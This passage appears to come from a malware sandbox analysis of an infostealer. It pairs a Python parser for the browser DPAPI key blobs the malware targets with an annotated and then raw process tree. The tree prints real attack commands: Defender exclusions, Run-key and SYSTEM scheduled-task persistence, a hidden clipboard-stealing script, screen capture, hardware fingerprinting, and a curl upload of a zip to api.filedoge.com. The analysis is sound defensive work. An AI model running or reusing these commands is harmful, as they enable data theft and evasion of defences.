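        return chunk

    def guid() -> str:
        return str(uuid.UUID(bytes_le=take(16)))

    if u32() != 1:
        raise ValueError("unsupported DPAPI blob version")
    info = {"provider": guid(), "master_key_version": u32(), "master_key": guid(), "flags": u32()}
    info["description"] = take(u32()).decode("utf-16-le").rstrip("\x00")
    info["alg_crypt"], info["alg_crypt_bits"] = u32(), u32()
    info["salt"] = take(u32())
    info["hmac_key"] = take(u32())
    info["alg_hash"], info["alg_hash_bits"] = u32(), u32()
    info["hmac2_key"] = take(u32())
    info["data"] = take(u32())
    info["sign"] = take(u32())
    if pos != len(blob):
        raise ValueError("trailing bytes after signature")
    return info


def looks_like_os_crypt_key(info: dict) -> bool:
    """Heuristic (assumption, not from the report): Chromium's os_crypt key is 32 bytes, which under
    AES-256-CBC with one block of PKCS#7 padding yields exactly 48 bytes of ciphertext."""
    return info["provider"] == DPAPI_PROVIDER and info["alg_crypt"] == 0x6610 and len(info["data"]) == 48


if __name__ == "__main__":
    for label, blob in (("PID 1004", CHROME_BLOB), ("PID 2760", EDGE_BLOB)):
        i = parse_dpapi_blob(blob)
        print(f"{label}: desc={i['description']!r} master_key={i['master_key']} "
              f"crypt={ALG_NAMES.get(i['alg_crypt'], hex(i['alg_crypt']))} "
              f"hash={ALG_NAMES.get(i['alg_hash'], hex(i['alg_hash']))} "
              f"data={len(i['data'])}B os_crypt_key={looks_like_os_crypt_key(i)}")
```

Both blobs carry the same master-key GUID, so they were protected under the same user profile, and the descriptions ("Google Chrome", "Edge") are the strings Chromium writes when it protects the key, which is how you can tell from the command line alone which browser's key each call targets. Neither the master key nor the decrypted output appears in the report, so that is where the analysis of this step stops.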
  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      PID: 1724

    [3] C:\Windows\System32\Wbem\WMIC.exe
        wmic diskdrive get serialnumber
        - Suspicious use of AdjustPrivilegeToken
        PID: 5732

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
      PID: 396

    [3] C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
        PID: 4052

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      PID: 4668

    [3] C:\Windows\system32\schtasks.exe
        schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
        - Scheduled Task/Job: Scheduled Task
        PID: 5292

      (A task with /RU SYSTEM can only be created from an elevated context; the report does not show whether this call succeeded. The same RunBatHidden.vbs is also launched directly below, PID 1696, so the batch file's actions are observed in this run either way.)

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
      - Clipboard Data
      - Hide Artifacts: Hidden Window
      PID: 792

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
        - Command and Scripting Interpreter: PowerShell
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        PID: 676

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline"
          PID: 1016

        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP"
            PID: 3516

      (This is the process that writes the HKCU ...\Run\Powershell value pointing at C:\Users\Admin\AppData\Roaming\kNPBRiEUjxJrLAI.ps1 listed under "Adds Run key to start application": the clipboard script installs its own persistence.)

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      PID: 5672

    [3] C:\Windows\System32\Wbem\WMIC.exe
        wmic bios get smbiosbiosversion
        - Suspicious use of AdjustPrivilegeToken
        PID: 464

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
      PID: 5684

    [3] C:\Windows\system32\cscript.exe
        cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
        PID: 1696

      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
          PID: 3880

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 2684

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            PID: 5692

        [5] C:\Windows\system32\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\Discord Hack Tool.exe" /f
            - Adds Run key to start application
            - Modifies registry key
            PID: 5652

        [5] C:\Windows\system32\reg.exe
            reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
            - Modifies registry key
            PID: 5276

        [5] C:\Windows\system32\curl.exe
            curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
            PID: 2572

        (The batch file runs in a deliberate order: exclude the Startup folder and its parent from Defender, re-add the Run key that was deleted at PID 4052, then drop a second binary into the now-excluded Startup folder. YOUR-BINDED-EXE-LINK-HERE is an unfilled builder placeholder rather than a URL, so that final download cannot succeed in this run; Add-MpPreference itself needs administrator rights, and the report does not show whether those calls took effect.)

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      PID: 1172

    [3] C:\Windows\System32\Wbem\WMIC.exe
        wmic baseboard get serialnumber
        PID: 1540

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      PID: 4828

    [3] C:\Windows\System32\Wbem\WMIC.exe
        wmic MemoryChip get /format:list
        PID: 1504

    [3] C:\Windows\system32\find.exe
        find /i "Speed"
        PID: 6000

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      PID: 876

    [3] C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_computersystemproduct get uuid
        PID: 5336

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      PID: 2240
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:5112
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:3688
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:1668
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:1740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:6104
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:2964
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:5644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5248
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:2124
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:6056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3448
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2776
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3544
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2080
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4192
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4540
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5780
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3100
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5616
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵
- Blocklisted process makes network request
PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1496
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1728
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1364
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1016
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:5452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";"2⤵PID:4632
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";3⤵PID:2928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2884
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3920
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:6012
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4544
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5600
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2760
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3448
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1828
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3496
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3564
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5472
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1796
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5408
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5608
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1332
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1276
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5140
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5752
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2948
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3752
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1420
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4300
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1984
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:888
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2592
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1408
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2536
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2276
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2144
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2200
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5708
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5600
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5004
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5564
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:2404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5328
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2124
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:756
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4848
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:364
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:4268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4316
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1476
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5428
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4228
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5684
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:6128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:1064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5140
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2068
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5352
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5616
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4104
-
